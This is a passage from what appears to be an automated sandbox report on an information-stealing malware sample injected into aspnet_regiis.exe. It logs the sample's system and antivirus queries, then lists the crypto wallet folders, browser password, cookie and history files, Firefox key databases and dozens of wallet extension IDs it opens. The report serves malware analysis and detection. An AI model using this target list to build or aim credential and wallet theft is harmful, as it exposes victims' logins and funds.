                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C01253 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,24_2_68C01253
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: aspnet_regiis.exeString found in binary or memory: llets/Electrum-LTC
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                      Source: aspnet_regiis.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: aspnet_regiis.exeString found in binary or memory: Wallets/Exodus
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                      Source: aspnet_regiis.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: powershell.exe, 00000008.00000002.1749981425.0000000006216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
